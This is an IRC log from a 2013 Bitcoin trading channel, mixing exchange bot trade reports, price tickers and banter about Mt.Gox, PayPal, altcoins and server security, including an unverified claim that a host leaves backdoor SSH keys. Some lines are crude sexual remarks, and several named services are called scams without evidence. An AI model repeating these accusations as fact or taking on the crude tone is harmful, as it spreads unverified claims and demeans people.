[ASICMINER-PT] 6 @ 1.09 = 6.54 BTC [-] Apr 24 09:20:36 [BTCTC] [ASICMINER-PT] 5 @ 1.09001 = 5.4501 BTC [+] Apr 24 09:20:40 [BTCTC] [ASICMINER-PT] 1 @ 1.09 BTC [-] **** BEGIN LOGGING AT Wed Apr 24 16:57:47 2013 Apr 24 16:59:46 kakobrekla http://trilema.com/2013/bitbet-is-quite-the-lulzmine/#comment-92898 jurov is trolling you Apr 24 17:03:55 hm Apr 24 17:04:12 well its trolling someone but im not sure its me? Apr 24 17:05:14 [BTCTC] [CRYPTO-TRADE] 1 @ 0.175 BTC [-] Apr 24 17:05:16 [BTCTC] [CRYPTO-TRADE] 7 @ 0.173 = 1.211 BTC [-] Apr 24 17:11:25 >:D can't even agree whom i'm trolling Apr 24 17:11:56 jurov http://trilema.com/2013/bitbet-is-quite-the-lulzmine/#comment-92902 Apr 24 17:11:58 see that. Apr 24 17:13:42 yes, it's unlikely. but at least i found that fag problem Apr 24 17:13:46 *faq Apr 24 17:14:29 i thought it was fixed like a month ago Apr 24 17:14:41 hm? Apr 24 17:15:06 kakobrekla you recall, the bet calculation lists the total/his weight backwards Apr 24 17:15:09 jurov you talking about the formula? Apr 24 17:15:14 in the faq Apr 24 17:15:16 yea Apr 24 17:15:39 i told you it was backwards before didnt i? Apr 24 17:15:43 yes! Apr 24 17:15:52 i thought that meant tyou also fixed it Apr 24 17:16:11 some other consensus was reached afterwards iirc Apr 24 17:16:48 i need more memory modules. Apr 24 17:19:01 ram is pretty cheap these days Apr 24 17:19:22 but for the head. Apr 24 17:20:28 when they figure out how to plug it into asics, brain interface wwill follow soon Apr 24 17:20:57 er.. fpga i man Apr 24 17:21:43 hi all Apr 24 17:21:50 i'll have today another talk about bitcon scams Apr 24 17:21:59 with lots of scary numbers Apr 24 17:22:27 hi frenchie. Apr 24 17:22:37 jurov scare them tiger./ Apr 24 17:22:41 heya Apr 24 17:22:50 people love scary numbers Apr 24 17:23:09 ;;ticker Apr 24 17:23:10 BTCUSD ticker | Best bid: 162.00000, Best ask: 162.48000, Bid-ask spread: 0.48000, Last trade: 162.00000, 24 hour volume: 168626.00159905, 24 hour low: 132.63000, 24 hour high: 160.59800, 24 hour vwap: 145.09000 Apr 24 17:23:14 160 crossed... Apr 24 17:23:31 slimey btc. Apr 24 17:23:38 it's going to crash so hard Apr 24 17:24:06 heh. Apr 24 17:24:10 i predict we'll drop to 40 USD/BTC when jurov releases his scary numbers Apr 24 17:25:08 http://prezi.com/ag6ujv66o7to it's in slovak.. so limited audience only Apr 24 17:25:30 numbers in slovak ? Apr 24 17:26:09 oh, non-slovaks will be told "Strata" means profit Apr 24 17:26:17 and all be well Apr 24 17:26:36 i don't speak slovak and my box doesn't speak flash :D Apr 24 17:27:11 slovak looks even more hardcore than romanian Apr 24 17:27:47 lol.. i think we have biggest number of accented characters in yurp Apr 24 17:28:18 french is worst Apr 24 17:28:20 i'm sure i'll make vi segfault if i try to paste that Apr 24 17:28:42 error4733: french is always worst Apr 24 17:29:02 [HAVELOCK] [HIM] 1 @ 1.7717 BTC [-] Apr 24 17:29:03 [HAVELOCK] [HIM] 1 @ 1.77160001 BTC [-] Apr 24 17:29:05 [HAVELOCK] [HIM] 1 @ 1.7714 BTC [-] Apr 24 17:29:06 [HAVELOCK] [HIM] 2 @ 1.73 = 3.46 BTC [-] Apr 24 17:29:19 vi segfaults ? HERESY Apr 24 17:29:51 ^^^ Apr 24 17:30:01 notepad segfaults if you just look at it the wrong way, i'm sure i can make vi segfault Apr 24 17:31:18 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Apr 24 17:31:29 might be able to segfault vi by using vi opening a symlink to vi Apr 24 17:31:34 never tried Apr 24 17:33:51 KRS-1 i have it doesn't. Apr 24 17:34:52 vi /dev/random? Apr 24 17:35:17 mircea_popescu likes Vi? Apr 24 17:35:20 Who woulda thought. Apr 24 17:35:39 I thought you woulda been all about the emacs :P Apr 24 17:35:40 who doesn't like vi? Apr 24 17:35:49 FabianB: people who like emacs? Apr 24 17:36:24 I pose the same question... Apr 24 17:36:32 as long as everyone hates xcode humanity still has a chance Apr 24 17:36:38 all emacs commands should be symlinked to ed :P Apr 24 17:38:20 I just saved a bunch of money on my car insurance thanks to Bitcoin. Apr 24 17:38:39 [BTCTC] [GOLD] 1 @ 0.0971 BTC [-] Apr 24 17:40:42 why ? you just bought bitcoin instead of your car insurance ? :D Apr 24 17:41:27 no because I don't drive a car! Apr 24 17:41:29 XD Apr 24 17:41:32 do you get it? Apr 24 17:41:33 lololol Apr 24 17:42:51 no i don't Apr 24 17:43:02 error4733 was funnier ;-) Apr 24 17:43:48 ;;goxlag Apr 24 17:43:48 MtGox lag is 0.269184 seconds. During this time, light travels 0.000539441722066 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 24 17:44:31 i had sex with two girls up until 2pm because of bitcoin Apr 24 17:46:08 did you really? Apr 24 17:46:28 did you tell them how many bitcoins you had, and they started blowing you? Apr 24 17:46:43 a, no. Apr 24 17:46:55 :P Apr 24 17:46:56 i was wearing bitcoin buttons and it sparked a conversation Apr 24 17:47:12 (with one of them. the other i knew for a while) Apr 24 17:47:24 buttons = cufflinks. Apr 24 17:47:54 buttons and cufflings are two entirely different things bro :P Apr 24 17:49:42 ya well davout threw me off. Apr 24 17:50:35 my sex appeal troubles ladies and gents without distinction apparently Apr 24 17:50:44 did you tell em it was eriks really? Apr 24 17:51:14 kakobrekla thickens the plot ;) Apr 24 17:51:18 As always. Apr 24 17:51:55 [MPEX] [S.MPOE] 1015 @ 0.00065536 = 0.6652 BTC [-] Apr 24 17:51:57 [MPEX] [S.MPOE] 17454 @ 0.00066345 = 11.5799 BTC [+] Apr 24 17:52:04 truffles, no, i don't use btc as a means to a wet cock Apr 24 17:52:05 kakobrekla no. Apr 24 17:52:36 aw, could have gotten a village of girls then Apr 24 17:52:50 i only share bills and fines. i don't share the finer things of life :D Apr 24 17:53:42 ew cooties Apr 24 17:57:02 [HAVELOCK] [SDICE] 25 @ 0.285 = 7.125 BTC [-] Apr 24 17:58:06 http://leaprate.com/forex-industry-news/entry/ig-to-offer-binary-bets-on-bitcoins.html?acm=2607_147 Apr 24 17:58:42 http://www.igindex.co.uk/spread-betting/bitcoin-binary-bets.html Apr 24 18:00:39 kinda old news neh ? Apr 24 18:00:59 24 april is old? Apr 24 18:02:56 http://goingglobaleastmeetswest.blogspot.ro/2013/04/paypal-and-bitcoin-paypal-unit-talks.html Apr 24 18:07:52 [MPEX] [S.MPOE] 3800 @ 0.00065007 = 2.4703 BTC [-] Apr 24 18:08:20 http://bitcoin-exchange.info/ look, another one. Apr 24 18:10:57 cute design Apr 24 18:11:52 its fugly. Apr 24 18:15:26 so boys and girls, i am indeed proud to say http://trilema.com/2013/smpoe-is-one-year-old/ Apr 24 18:16:33 =) Apr 24 18:17:40 oh noes, no trilema credits left Apr 24 18:18:37 aww! Apr 24 18:19:33 [BTCTC] [GSDPT] 2 @ 0.0031 = 0.0062 BTC [-] Apr 24 18:21:40 congrats mircea_popescu !!! one year and going gangbusters Apr 24 18:21:51 :D Apr 24 18:22:25 mircea_popescu: pic of you wearing a party hat or it didn't happen Apr 24 18:22:34 shoeonhead Apr 24 18:22:37 im too tall for hats Apr 24 18:22:59 jcpham http://fashionreverie.com/wp-content/uploads/2012/07/schiaparelli-shoe-hat_insert.jpg Apr 24 18:23:05 the right size is when feet correctly touch the ground, your argument is invalid Apr 24 18:30:10 so one year and how many millions have you made already? Apr 24 18:31:15 i'm in the red Apr 24 18:31:36 bitcoin is my tax write-off Apr 24 18:35:32 https://bitcointalk.org/index.php?topic=175989.msg1929906#msg1929906 Apr 24 18:35:33 hehe Apr 24 18:37:52 lippoper some. Apr 24 18:38:21 kakobrekla his team and he created bitinstant. Apr 24 18:38:31 orly? Apr 24 18:38:46 shammoons? Apr 24 18:38:55 but bitinstant sucks Apr 24 18:38:58 Cryptostreet looks interesting Apr 24 18:38:59 yes. one year later and with none of the key people/ideas/etc. Apr 24 18:39:05 [BTCTC] [ASICMINER-PT] 1 @ 1.144 BTC [+] Apr 24 18:39:28 ah Apr 24 18:39:36 dunno if its same Apr 24 18:39:58 but srsly, bitinstant has srs problems Apr 24 18:39:58 but that's the thing right ? use all exchanges Apr 24 18:40:03 then run into api problems etc Apr 24 18:40:13 then get a 500 people group to scream you're a scam Apr 24 18:42:31 ;;ticker Apr 24 18:42:32 BTCUSD ticker | Best bid: 165.90000, Best ask: 165.92997, Bid-ask spread: 0.02997, Last trade: 165.90000, 24 hour volume: 170812.60135934, 24 hour low: 132.63000, 24 hour high: 165.78000, 24 hour vwap: 147.24836 Apr 24 18:42:39 bitcoin, stop Apr 24 18:42:44 NO U Apr 24 18:42:50 NO U Apr 24 18:42:56 BBQ Apr 24 18:43:12 no wait, skateboards. Apr 24 18:43:19 ah, yeah Apr 24 18:43:20 SKATEBOARDS Apr 24 18:43:20 BBQCoins Apr 24 18:43:21 oh yeah Apr 24 18:45:11 so the issue here is, paypal CEO actually got asked about bitcoin, actually said he's fascinated with it, ACTUALLY SAID they are considering moving over. Apr 24 18:45:54 just like gox goes from "we will implement ltc" to "we are considering it" few weeks later Apr 24 18:46:00 next will be "is not secure enough" Apr 24 18:46:15 afaik this is the first time they discuss it. Apr 24 18:46:42 pp are assholes and mtgox are assholes, but quite different types of assholes i would say. Apr 24 18:47:01 like a top new york firm lawyer is an asshole and some tribal witch doctor in nigeria are both assholes Apr 24 18:47:16 he cant say no and he cant say yes Apr 24 18:47:18 anyway, here's it> http://www.bloomberg.com/video/paypal-sees-20-billion-in-mobile-transactions-WlokACTBRterdjHAJGNB6w.html Apr 24 18:47:18 what can he do Apr 24 18:47:59 so overall, do you still believe Mt.Gox will implement LTC and/or NMC ? Apr 24 18:48:17 prolly no Apr 24 18:48:29 they have bigger problems Apr 24 18:48:46 really? like what? Apr 24 18:48:54 have use used them? Apr 24 18:49:02 you used* Apr 24 18:49:48 well, theres no lag now. throwing more hardware at shitty software works Apr 24 18:50:00 right. Apr 24 18:50:45 Scrat it wasn't the hardware. Apr 24 18:50:56 they finally started refusing small orders. Apr 24 18:51:27 lag aint over Apr 24 18:51:27 http://jezus.si/graf/dashboards/bitcoin/details/lag/ Apr 24 18:51:33 its just sub 1h Apr 24 18:51:36 (for now) Apr 24 18:51:45 I still see plenty of .01 orders Apr 24 18:52:06 ;;ticker Apr 24 18:52:07 BTCUSD ticker | Best bid: 163.50000, Best ask: 164.00000, Bid-ask spread: 0.50000, Last trade: 164.00000, 24 hour volume: 174282.55009237, 24 hour low: 132.63000, 24 hour high: 166.43424, 24 hour vwap: 147.69064 Apr 24 18:54:47 i think the lag is the least of their problems Apr 24 18:55:50 there's one thing i don't understand. Apr 24 18:56:07 slush has been fucked over by both linode and ovh so far, as in, insider jobs. Apr 24 18:56:24 mtgox doesn't seem like they have enough of a clue to get proper physical security of their servers in place Apr 24 18:56:36 slush got fucked by ovh ? ouch Apr 24 18:56:49 yet in spite of being a bigger target thery've not been hit yet. something here is wrong. Apr 24 18:56:57 davout yes, seems insider job he says. Apr 24 18:57:45 mircea_popescu: because when an ovh server is installed the first thing to do, like in the first ten seconds you get the server is to remove their backdoor, namely a couple of ssh keys in /root/.ssh Apr 24 18:58:43 davout not sure he knew about this or w/e Apr 24 18:58:51 check his pool's thread, it's there. Apr 24 18:58:58 davout, you sure it's like that? Apr 24 18:59:29 davout, if it's similar as hetzner (it should be), they're just providing an rescue image Apr 24 18:59:35 a* Apr 24 18:59:42 but you have to reboot to get there Apr 24 18:59:52 yep, they have a backdoor installed, it's supposed to be for their support, if for whatever reason they need root access to your machine Apr 24 19:00:05 fuck, that's lame Apr 24 19:00:06 if you remove they key a reboot is necessary to compromise your machine Apr 24 19:00:19 which is moot since you should never have ssh exposed to the internet Apr 24 19:00:46 Scrat, isn't that the point of ssh? :) Apr 24 19:00:52 and if you have a passphrase on your wallet it'll lock it down at reboot Apr 24 19:00:52 ya srsly i was thinking Apr 24 19:00:57 no http either ? Apr 24 19:01:17 orkaa: ip whitelist Apr 24 19:01:46 davout ya, so it'll lock it down at reboot. but the attacker installs a logger, then you reboot, put your pw in and then it reboots again. Apr 24 19:02:06 fair enough Apr 24 19:02:14 davout, that's still exposed to the internet technically Apr 24 19:02:34 orkaa: you can whitelist another server as required hop Apr 24 19:02:51 mircea_popescu: correct, i do concur that physically securing servers is important Apr 24 19:03:17 want : http://www.iliad-datacenter.fr/datacenters/dc4 Apr 24 19:03:24 davout: but only a handful of providers will do that (and you have to colo) Apr 24 19:03:28 davout, sure, but at the end of the road it's still exposed to the internet somehow Apr 24 19:03:29 servers in nuclear bunker Apr 24 19:03:37 just some points of obscurity added inbetween Apr 24 19:03:43 [BTCTC] [ASICMINER-PT] 2 @ 1.144 = 2.288 BTC [+] Apr 24 19:03:50 orkaa: that's why it's useless Apr 24 19:04:05 why can't anybody have secured backend? Apr 24 19:04:10 Scrat: gotta know what you want :-) Apr 24 19:04:25 26m underground Apr 24 19:04:39 Scrat so yo ucolo. and every dc has lockable cages. Apr 24 19:05:01 issuing btc transactions doesn't required some huge bandwidth/latency Apr 24 19:05:07 nor pgp Apr 24 19:05:21 i don't understand why you need to have it sitting in dc Apr 24 19:05:32 because skateboards Apr 24 19:05:45 mircea_popescu: everyone will give you a locked cage, im talking more than that Apr 24 19:08:59 orkaa: ssh firewalled to a single static ip (while dropping all other packets) does not qualify as open to the internet Apr 24 19:09:30 Scrat, when was the last remote ssh exploit? 10yrs ago? Apr 24 19:10:46 there actually was one ? Apr 24 19:10:52 jurov: you have a point there, but this doesn't only apply to ssh Apr 24 19:10:53 [BTCTC] [PAJKA.BOND] 2 @ 0.0951 = 0.1902 BTC [-] Apr 24 19:10:54 as opposed to some filthy datacenter mucking with your machine Apr 24 19:11:13 [BTCTC] [PAJKA.BOND] 10 @ 0.095 = 0.95 BTC [-] Apr 24 19:12:50 so strongcoin is scamming. Apr 24 19:12:52 mircea_popescu, i think there was some attack that required you to feed several megabytes to the port before the openssh server folded Apr 24 19:12:56 https://bitcointalk.org/index.php?topic=186051.0 Apr 24 19:13:02 and also debian's weak keys Apr 24 19:13:17 well i don't count weak keys as an actual attack Apr 24 19:14:43 https://bitcointalk.org/index.php?topic=186185.0 lmao at this guy Apr 24 19:14:54 "is there escrow for very large sums ? cause i could do it". Apr 24 19:14:56 jurov: plenty of serious attacks on SSL in the past years though Apr 24 19:14:57 unheard of guy. Apr 24 19:14:59 Scrat, IPs can be spoofed Apr 24 19:15:04 which openSSH uses Apr 24 19:15:15 orkaa: I'd like you see you spoof a tcp handshake Apr 24 19:15:49 yeah it's very unlikely but possible Apr 24 19:15:54 s/you/to/ Apr 24 19:17:27 uh https://bitcointalk.org/index.php?topic=186112.0 Apr 24 19:17:57 coin is gonna be worthless soon at this rate Apr 24 19:19:27 ;;eightball does MPOE-PR have a dick Apr 24 19:19:27 It shall be. Apr 24 19:19:37 that's a yes Apr 24 19:24:00 i sort of prefer the ethical debate here: https://bitcointalk.org/index.php?topic=186051.0 Apr 24 19:25:16 i kinda like the idea of re-stealing bitcoins Apr 24 19:25:40 oops, sorry hacker you stored your ill-gotten gains ona web wallet. too bad, try again. Apr 24 19:25:55 haha Apr 24 19:30:40 ASICMINER erupter blade - first review up - https://bitcointalk.org/index.php?topic=181300.60 Apr 24 19:40:02 ;;ticker Apr 24 19:40:04 BTCUSD ticker | Best bid: 152.11101, Best ask: 154.00000, Bid-ask spread: 1.88899, Last trade: 152.11101, 24 hour volume: 181715.91267301, 24 hour low: 133.25000, 24 hour high: 166.43438, 24 hour vwap: 149.18437 Apr 24 19:40:06 freefall mode Apr 24 19:41:38 a well Apr 24 19:42:11 breakfast was more exciting Apr 24 19:51:26 omg too funny wall street again Apr 24 19:51:31 https://bitcointalk.org/index.php?topic=175989.msg1932372#msg1932372 Apr 24 19:57:17 https://bitcointalk.org/index.php?topic=186458.msg1932156#msg1932156 Apr 24 19:57:23 lol ciuciu acidentally selfowned Apr 24 19:57:56 lol Apr 24 19:58:02 shouldnt he be scammzor tagged Apr 24 20:00:08 kakobrekla i don't think anyone bothers anymore. Apr 24 20:00:51 its like people just wake up, have a beer, get on the internet and go, "let's bring wall-street to BTC!!!111" Apr 24 20:01:19 because wall street is this concept right ? which is accessible to them Apr 24 20:01:25 have a watery beer. Apr 24 20:01:35 this is how they got involved with bitcoin too. by symlinking the Bitcoin symbol. Apr 24 20:02:02 sorta like, why bother installing vi ? just make a file called vi and that's it, you have vi now Apr 24 20:03:46 yawn, another half hour talk about why is the regulation bad and taxes immoral Apr 24 20:03:47 heheh. Apr 24 20:04:22 !l m s.dice Apr 24 20:04:23 Last trade for S.DICE on MPEX was at 0.0023263 BTC [-] Apr 24 20:05:10 $vwap s.dice Apr 24 20:05:11 mod6: S.DICE 1 day: average: 0.00239767 high: 0.00240002 low: 0.0023263 volume: 6713 btc: 16.0955419 7 day: average: 0.00274501 high: 0.00371221 low: 0.0012 volume: 71819 btc: 197.14412849 30 day: average: 0.00322186 high: 0.0045 low: 0.0012 volume: 1575370 btc: 5075.6277982 Apr 24 20:05:12 orkaa what was the site, jezuz.si ? Apr 24 20:05:23 jezus.si Apr 24 20:05:26 ty Apr 24 20:05:58 HAHA Apr 24 20:06:04 what is this desire to involve wall street Apr 24 20:06:15 no idea jcpham Apr 24 20:06:24 ty have a tit http://polimedia.us/dtng/c/src/134166225424.jpg Apr 24 20:06:39 its like they think that bitcoin hasn't "made it" unless maria is talking about it everyday or some bullshit Apr 24 20:07:14 mircea_popescu: damn, nice rack Apr 24 20:07:16 let's get the credit card companies to accept btc too Apr 24 20:07:52 bitcoin reminds me a lot of fight club Apr 24 20:07:59 especially the first rule and eventual ending Apr 24 20:08:04 lots of delusion? Apr 24 20:08:14 all of it, really Apr 24 20:08:16 haha Apr 24 20:08:34 delusion is pretty good Apr 24 20:08:53 i knew i was supposed to be golfing in the ghetto instead of working on this retarded database... Apr 24 20:09:36 ahahha Apr 24 20:09:38 "On your tenth anniversary, you will still be ten years ahead of the rest." Apr 24 20:09:39 i like that Apr 24 20:10:09 pretty good yeah Apr 24 20:10:22 jcpham, now how would you imagine bitcoin credit card to work? Apr 24 20:10:40 i don't imagine it Apr 24 20:10:43 http://polimedia.us/dtng/c/res/18903.html o.o Apr 24 20:10:45 maybe with fiat only, bitcoin to be used only to repay Apr 24 20:10:52 what esl dood did this! Apr 24 20:11:08 i'm sortof anti-technology Apr 24 20:11:19 as funny as that may sound Apr 24 20:11:39 i'd fund a bitcoin credit card throuhg intermediaries most likely Apr 24 20:11:49 ajhahah Apr 24 20:12:00 scumbag jcpham : gets bitcoin credit card, Apr 24 20:12:04 loads it up on -otc Apr 24 20:12:29 haha Apr 24 20:12:57 no but it's the interpretation Apr 24 20:13:00 didn't take long for the meme's to pop up on those pictures. Apr 24 20:13:01 some of those aint bad. Apr 24 20:15:23 hi everyone Apr 24 20:15:41 sup Apr 24 20:15:45 kakobrekla it kinda looks like google translate became a singularity and is now trolling me Apr 24 20:16:05 hehe Apr 24 20:16:16 heh thats pretty funny..and creative Apr 24 20:16:38 T'sup MJR! Apr 24 20:16:46 I'm chillin at work Apr 24 20:16:58 bitcoiners are allowed to work ? Apr 24 20:17:16 I'm a po man's bitcoina masta Apr 24 20:18:09 i sold most of my loot from mining ops Apr 24 20:18:13 pretty funny Apr 24 20:19:14 mircea_popescu: i really like the year long graph btw, thanks for putting that in there. Apr 24 20:21:30 mod6 incredibly stable i thought Apr 24 20:27:00 oh for sure. Apr 24 20:28:59 [BTCTC] [BTC-GOLD] 1 @ 0.0099 BTC [-] Apr 24 20:36:11 the market is shitting brix Apr 24 20:39:41 ;;ticker Apr 24 20:39:42 BTCUSD ticker | Best bid: 152.00000, Best ask: 152.20200, Bid-ask spread: 0.20200, Last trade: 152.00000, 24 hour volume: 208710.00960842, 24 hour low: 133.30010, 24 hour high: 166.43438, 24 hour vwap: 149.97855 Apr 24 20:39:44 ze ole bitcoin roll-over kakobrekla Apr 24 20:46:29 ;;bids 130 Apr 24 20:46:32 There are currently 20478.063 bitcoins demanded at or over 130.0 USD, worth 2864105.87673 USD in total. | Data vintage: 0.0070 seconds Apr 24 20:47:03 [BTCTC] [S.DICE-PT] 6 @ 0.0033 = 0.0198 BTC [-] Apr 24 20:47:57 yeah Apr 24 20:48:04 its volatile today Apr 24 20:48:08 and not even thursday Apr 24 20:48:15 [BTCTC] [BASIC-MINING] 1 @ 0.4001 BTC [-] Apr 24 20:48:18 [BTCTC] [BASIC-MINING] 5 @ 0.40001 = 2.0001 BTC [-] Apr 24 20:48:21 or is it Apr 24 20:48:26 nope Apr 24 20:48:54 [BTCTC] [ASICMINER-PT] 2 @ 1.144 = 2.288 BTC [+] Apr 24 20:48:54 it has been more vol in the last ~36 hours than in the previous few days Apr 24 20:48:58 *volume Apr 24 20:49:54 but newbs will prob. get goxxed when the lag-a-thon continues Apr 24 20:50:16 [BTCTC] [B.YABMC] 6 @ 0.01629 = 0.0977 BTC [-] Apr 24 20:52:29 Hi Apr 24 20:52:40 MoneyHoney: asl? Apr 24 20:53:17 that saying is so 1990s Apr 24 20:53:46 maybe he wants 2 cyber? Apr 24 20:54:01 16/f/las vegas here Apr 24 20:54:45 hello MoneyHoney Apr 24 20:54:56 Hello Apr 24 20:55:05 wow is no one talking on here Apr 24 20:55:31 you just joined a second ago. Apr 24 20:56:15 "This community being what it is (40% ex-SA trolls, 30% clueless idiots, 10% intelligent assholes, 10% blatant scammers, 5% psychopaths, 2% bored college kids, 2% eccentric entrepreneurs, 1% Phinneaus Gage, and 1% people who can't count)" Apr 24 20:56:21 did he misspell pg's nick ? Apr 24 20:57:22 lol Apr 24 20:58:15 mircea_popescu: hello Apr 24 20:58:24 heya Chilca Apr 24 20:58:25 i'm always here Apr 24 20:59:04 [HAVELOCK] [VTX] 10 @ 0.4512 = 4.512 BTC [+] Apr 24 21:01:53 Do I have to do something to see the cheat Apr 24 21:02:03 chat* Apr 24 21:02:04 [HAVELOCK] [VTX] 10 @ 0.451 = 4.51 BTC [-] Apr 24 21:02:40 MoneyHoney you're seeing it aren't you. Apr 24 21:03:12 nope nothing! Apr 24 21:03:15 hmm, I wonder which group I fit into Apr 24 21:04:21 jborkl maybe you're the other 1% Apr 24 21:04:41 well, I think I can count ok Apr 24 21:05:11 lol Apr 24 21:05:13 no no, the even-other-er 1% Apr 24 21:05:34 I'm thinking about buying PPC Apr 24 21:06:01 sound like a good idea. Apr 24 21:08:02 what's ppc ? Apr 24 21:08:37 PPCoin Apr 24 21:08:51 paypal coin Apr 24 21:09:13 http://www.ppcoin.org/ Apr 24 21:10:33 executive summary ? Apr 24 21:10:49 Well, clicking on that link and seeing the stick figures inspired confidence Apr 24 21:10:52 well, mircea has MECoin (mind experiment coin), rather buy some of those Apr 24 21:11:17 has a lower difficulty ya know Apr 24 21:11:22 right lol Apr 24 21:11:34 [BTCTC] [ASICMINER-PT] 1 @ 1.144 BTC [+] Apr 24 21:12:35 haha Apr 24 21:12:39 proof of steak: http://img.gawkerassets.com/img/17h4v50kfr1dijpg/original.jpg Apr 24 21:12:54 see, didn't even have to invent an altcoin Apr 24 21:12:54 funny shit Apr 24 21:17:13 https://bitcointalk.org/index.php?topic=186609.0 Apr 24 21:17:15 hmm Apr 24 21:17:33 underground bunker didnt help Apr 24 21:18:13 yikes Apr 24 21:18:14 I had not even heard of them Apr 24 21:18:34 These places are blowing up faster than I can keep up with them Apr 24 21:18:39 thats the davouts thing right Apr 24 21:18:46 lol "Please do not call, do not email." Apr 24 21:20:06 1-900-BTC-HAXX Apr 24 21:21:06 looks like 160 might have been the new high, for now Apr 24 21:21:44 well 167 for the last few .. Apr 24 21:22:42 X-Powered-By:Phusion Passenger (mod_rails/mod_rack) 3.0.19 Apr 24 21:22:43 :'( Apr 24 21:23:00 yeah, he was braging about it Apr 24 21:23:02 :P Apr 24 21:23:24 [BTCTC] [ASICMINER-PT] 1 @ 1.1433 BTC [-] Apr 24 21:24:04 [HAVELOCK] [HIM] 1 @ 1.5 BTC [-] Apr 24 21:24:05 [HAVELOCK] [HIM] 3 @ 1.4631 = 4.3893 BTC [-] Apr 24 21:25:04 [HAVELOCK] [HIM] 1 @ 1.4631 BTC [-] Apr 24 21:25:39 [BTCTC] [ASICMINER-PT] 1 @ 1.1433 BTC [-] Apr 24 21:26:45 use ;;seen Apr 24 21:27:02 bowjob was last seen in #bitcoin-assets 1 day, 19 hours, 20 minutes, and 11 seconds ago: lol Apr 24 21:27:04 [HAVELOCK] [HIM] 2 @ 1.45 = 2.9 BTC [-] Apr 24 21:27:05 [HAVELOCK] [HIM] 10 @ 1.44 = 14.4 BTC [-] Apr 24 21:27:10 yw Apr 24 21:27:51 awwww Apr 24 21:28:06 i hurt my image enough in romania Apr 24 21:28:22 [BTCTC] [ASICMINER-PT] 1 @ 1.144 BTC [+] Apr 24 21:28:45 nope Apr 24 21:28:58 somalia Apr 24 21:29:49 [BTCTC] [PAJKA.BOND] 1 @ 0.098 BTC [+] Apr 24 21:29:58 [BTCTC] [PAJKA.BOND] 2 @ 0.1005 = 0.201 BTC [+] Apr 24 21:33:39 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Apr 24 21:34:09 what wait what AGAIN ?! Apr 24 21:34:18 darkee daybyter DBordello DeaDTerra deadweasel DianaComan dub Apr 24 21:34:21 davout ? Apr 24 21:35:02 hes gone Apr 24 21:35:45 ;;seen davout Apr 24 21:35:46 davout was last seen in #bitcoin-assets 2 hours, 30 minutes, and 12 seconds ago: because skateboards Apr 24 21:35:53 LMAO quote Apr 24 21:36:08 i guess the party hat's on him. Apr 24 21:36:51 dub is dubzombie yours ? Apr 24 21:39:04 [MPEX] [S.MPOE] 4000 @ 0.00065807 = 2.6323 BTC [+] Apr 24 21:40:05 [MPEX] [S.MPOE] 13400 @ 0.00065807 = 8.8181 BTC [+] Apr 24 21:40:06 [MPEX] [S.MPOE] 8946 @ 0.00066345 = 5.9352 BTC [+] Apr 24 21:40:08 [MPEX] [S.MPOE] 27654 @ 0.00066904 = 18.5016 BTC [+] Apr 24 21:40:38 [MPEX] [S.MPOE] 796 @ 0.00066904 = 0.5326 BTC [+] Apr 24 21:40:42 [MPEX] [S.MPOE] 8400 @ 0.00068389 = 5.7447 BTC [+] Apr 24 21:40:44 [MPEX] [S.MPOE] 15150 @ 0.00070482 = 10.678 BTC [+] Apr 24 21:40:46 [MPEX] [S.MPOE] 5173 @ 0.00070888 = 3.667 BTC [+] Apr 24 21:40:48 [MPEX] [S.MPOE] 5481 @ 0.00071424 = 3.9147 BTC [+] Apr 24 21:41:09 assbot: stfu bro or ill pop you Apr 24 21:41:22 orly Apr 24 21:41:29 i am the ass whisperer Apr 24 21:43:16 rpietila is now making a conference? Apr 24 21:43:29 [MPEX] [S.MPOE] 2500 @ 0.000705 = 1.7625 BTC [-] Apr 24 21:44:11 i recall this is one of the recent noobs but can't place him Apr 24 21:44:13 was it new exchange ? Apr 24 21:44:48 silvervault guy, binary bitcoin options something something Apr 24 21:45:15 o ok Apr 24 21:45:16 a whooping 400btc pledged Apr 24 21:46:29 am i stating the obvious? the whales increase the volume or move their ask/bid closer to edge to repulse the edge, much as seen in other markets (http://www.nanex.net/aqck2/4165.html) Apr 24 21:47:48 fake walls Apr 24 21:47:51 since ever. Apr 24 21:50:08 kakobrekla: true that but more volume in HFT (algo trading) the past month or so Apr 24 21:53:01 [MPEX] [S.MPOE] 5500 @ 0.0007 = 3.85 BTC [-] Apr 24 21:57:05 "hi i open a account about one week to trade bit coins, in mt4 plataform, i lost the bit direction to send a initial deposit please send me again." Apr 24 21:57:06 omg Apr 24 21:57:11 he lost his bit direction. Apr 24 21:57:29 aww! Apr 24 22:04:12 [MPEX] [S.DICE] 576 @ 0.00299999 = 1.728 BTC [+] Apr 24 22:05:28 [MPEX] [S.DICE] 1200 @ 0.00349938 = 4.1993 BTC [+] Apr 24 22:06:18 [MPEX] [S.MPOE] 4900 @ 0.0007 = 3.43 BTC [-] Apr 24 22:06:20 [MPEX] [S.MPOE] 7500 @ 0.00070961 = 5.3221 BTC [+] Apr 24 22:08:16 ;;ticker Apr 24 22:08:16 BTCUSD ticker | Best bid: 142.25000, Best ask: 142.30000, Bid-ask spread: 0.05000, Last trade: 142.25000, 24 hour volume: 234722.15707060, 24 hour low: 136.07360, 24 hour high: 166.43438, 24 hour vwap: 150.32353 Apr 24 22:18:04 [HAVELOCK] [VTX] 1 @ 0.45010001 BTC [-] Apr 24 22:18:05 [HAVELOCK] [VTX] 1 @ 0.4275 BTC [-] Apr 24 22:18:06 [HAVELOCK] [VTX] 2 @ 0.42500001 = 0.85 BTC [-] Apr 24 22:31:03 [MPEX] [S.MPOE] 1674 @ 0.00070972 = 1.1881 BTC [+] Apr 24 22:31:53 [MPEX] [S.MPOE] 7000 @ 0.00071 = 4.97 BTC [+] Apr 24 22:48:20 lulz, I just read the Trilema blog Apr 24 22:48:58 great stuff , so very true in - history can teach much about the future Apr 24 22:56:04 [HAVELOCK] [SDICE] 1 @ 0.29859999 BTC [+] Apr 24 22:56:06 true : first well documented inflation is the sesterce in ancian roman empire Apr 24 22:56:06 [HAVELOCK] [SDICE] 11 @ 0.2986 = 3.2846 BTC [+] Apr 24 22:58:23 [BTCTC] [GSDPT] 500 @ 0.00301 = 1.505 BTC [-] Apr 24 22:58:33 [BTCTC] [GSDPT] 240 @ 0.003 = 0.72 BTC [-] Apr 24 23:04:04 [HAVELOCK] [SDICE] 1 @ 0.28000003 BTC [-] Apr 24 23:05:04 [HAVELOCK] [SDICE] 4 @ 0.28000003 = 1.12 